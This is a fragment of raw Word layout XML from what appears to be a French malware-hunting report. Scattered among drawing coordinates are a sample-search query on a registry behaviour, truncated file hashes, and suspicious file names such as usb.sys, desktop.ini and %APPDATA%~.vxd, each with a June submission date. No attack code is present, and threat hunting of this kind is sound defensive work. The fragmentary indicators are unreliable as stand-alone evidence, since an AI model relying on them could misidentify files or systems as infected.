            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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seconde recherche a été effectuée en se concentrant uniquement sur cette clé de registre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6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4369458</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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en ne conservant que les échantillons dont la première soumission est postérieure au 1er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4542813</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4498793" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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87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mai 2026 :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behavior_registry:WindowsResponby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8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4830468</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3748504" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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485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Cette requête a permis d'identifier les échantillons suivants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9616" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5923914</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5146698</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="579003" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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0" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1924049</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5320053</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1323915" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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9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1664" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5880735</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5320053</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="664728" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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7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première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2688" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4488179</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5320053</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1013084" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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3712" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5788024</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5493408</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="811871" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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8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soumission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47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5838455</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3256197" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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fce886ffdb574fdfadc926f78b4f044d5152613bc8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5760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5926720</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="572420" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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usb.sys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6784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5934098</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="446878" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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8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23 juin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78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6014985</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1722850" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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b544960538fdce1db19be0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88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6369315</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3256197" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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677e3bb8130e65dec6b3397a7d45fb35cb94385c50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9856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6457580</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="572420" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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usb.sys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0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6464958</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="446878" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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8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22 juin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19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6545845</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1722850" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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0559a1332063c1e04e8786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29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6900175</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3256197" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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0d7e4daf4abc91e43753ccd181ab7926158088cc75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3952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6988440</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="572420" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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usb.sys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4976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6995818</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="446878" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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8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15 juin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60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7076705</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1722850" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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201ad141d07abbc3644b00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70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7431035</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3256197" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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2eedbe83a90856b583980e8a8318e9c3cf87712634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8048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7519300</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1109287" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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"/>
                          </w:rPr>
                          <w:t xml:space="preserve">%APPDATA%~.vxd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9072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7526678</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="446878" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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8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10 juin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00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7607565</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1722850" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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b77d88046ffedddd5a07be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7961895</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3256197" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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0f896746da43ee8000ab5dd66bf47edbd1160f814b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2144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8050160</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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desktop.ini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3168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8057538</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="454983" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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9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21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41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8138425</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1722850" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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96b095fdc3c11ff2272fda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52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8492755</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3256197" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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3f4b0eee0f879b91811b5307aea1311faec7a364f9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6240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8581020</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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desktop.ini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7264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8588398</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="454983" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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9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21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82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8669285</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1722850" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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bb6f0aabe8cecd77982ae7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93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9023615</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3256197" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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815774fe0691bfb638f0abab56b226a901d9bee98b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0336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9111880</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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desktop.ini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0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9119258</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="454983" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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9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21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23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9200145</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1722850" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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be0bebf7b1bfba2332cc87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34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443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545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648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750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20057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9604" cy="697865"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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6978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697865">
                          <a:moveTo>
                            <a:pt x="4818379" y="697865"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="697865"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="697865"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3333749" y="697865"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="697865"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="697865"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="697865"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="697865"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="69786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90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1689109</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="4464685"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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4646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464685">
                          <a:moveTo>
                            <a:pt x="0" y="4189729"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="4189729"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="4464685"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4464685"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4189729"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2820034"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2820034"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="4190365"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4190365"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2820034"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2660015"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2660015"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2820034"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2820034"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2660015"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4819015" y="2653665"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="2653665"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="2123440"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4819015" y="2123440"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4819015" y="2653665"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3334385" y="2653665"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4818380" y="2653665"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818380" y="2123440"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3334385" y="2123440"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3334385" y="2653665"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="2653665"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3333750" y="2653665"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333750" y="2123440"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="2123440"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="2653665"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4819015" y="2122804"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="2122804"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="1592579"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4819015" y="1592579"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4819015" y="2122804"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3334385" y="2122804"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4818380" y="2122804"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818380" y="1592579"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3334385" y="1592579"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3334385" y="2122804"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="2122804"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3333750" y="2122804"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333750" y="1592579"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="1592579"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="2122804"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4819015" y="1591944"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="1591944"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="1061720"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4819015" y="1061720"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4819015" y="1591944"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3334385" y="1591944"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4818380" y="1591944"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818380" y="1061720"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3334385" y="1061720"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3334385" y="1591944"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="1591944"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3333750" y="1591944"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333750" y="1061720"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="1061720"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="1591944"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4819015" y="1061084"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="1061084"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="530860"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4819015" y="530860"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4819015" y="1061084"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3334385" y="1061084"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4818380" y="1061084"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818380" y="530860"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3334385" y="530860"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3334385" y="1061084"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="1061084"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3333750" y="1061084"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333750" y="530860"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="530860"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="1061084"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4819015" y="530225"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="530225"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4819015" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4819015" y="530225"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3334385" y="530225"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4818380" y="530225"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818380" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3334385" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3334385" y="530225"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="530225"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3333750" y="530225"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333750" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="53022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9604" cy="697865"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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6978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697865">
                          <a:moveTo>
                            <a:pt x="4818379" y="697865"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="697865"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="697865"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3333749" y="697865"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="697865"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="697865"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="697865"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="697865"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="69786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051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1689109</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="4464685"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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4646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464685">
                          <a:moveTo>
                            <a:pt x="0" y="4189729"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="4189729"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="4464685"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4464685"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4189729"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2820034"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2820034"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="4190365"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4190365"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2820034"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2660015"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2660015"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2820034"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2820034"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2660015"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4819015" y="2653665"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="2653665"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="2123440"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4819015" y="2123440"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4819015" y="2653665"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3334385" y="2653665"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4818380" y="2653665"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818380" y="2123440"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3334385" y="2123440"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3334385" y="2653665"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="2653665"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3333750" y="2653665"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333750" y="2123440"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="2123440"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="2653665"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4819015" y="2122804"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="2122804"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="1592579"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4819015" y="1592579"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4819015" y="2122804"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3334385" y="2122804"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4818380" y="2122804"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818380" y="1592579"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3334385" y="1592579"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3334385" y="2122804"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="2122804"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3333750" y="2122804"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333750" y="1592579"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="1592579"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="2122804"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4819015" y="1591944"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="1591944"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="1061720"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4819015" y="1061720"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4819015" y="1591944"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3334385" y="1591944"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4818380" y="1591944"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818380" y="1061720"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3334385" y="1061720"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3334385" y="1591944"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="1591944"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3333750" y="1591944"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333750" y="1061720"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="1061720"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="1591944"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4819015" y="1061084"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="1061084"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="530860"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4819015" y="530860"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4819015" y="1061084"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3334385" y="1061084"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4818380" y="1061084"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818380" y="530860"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3334385" y="530860"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3334385" y="1061084"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="1061084"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3333750" y="1061084"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333750" y="530860"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="530860"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="1061084"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4819015" y="530225"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="530225"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4819015" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4819015" y="530225"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3334385" y="530225"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4818380" y="530225"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818380" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3334385" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3334385" y="530225"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="530225"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3333750" y="530225"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333750" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="53022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8704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36589" cy="3359149"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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6589" cy="3359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6589" h="3359149">
                          <a:moveTo>
                            <a:pt x="3175" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3175" y="3359149"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="3355974"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5736589" y="3355974"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="2825115"/>
                          </a:moveTo>
                          <a:lnTo>
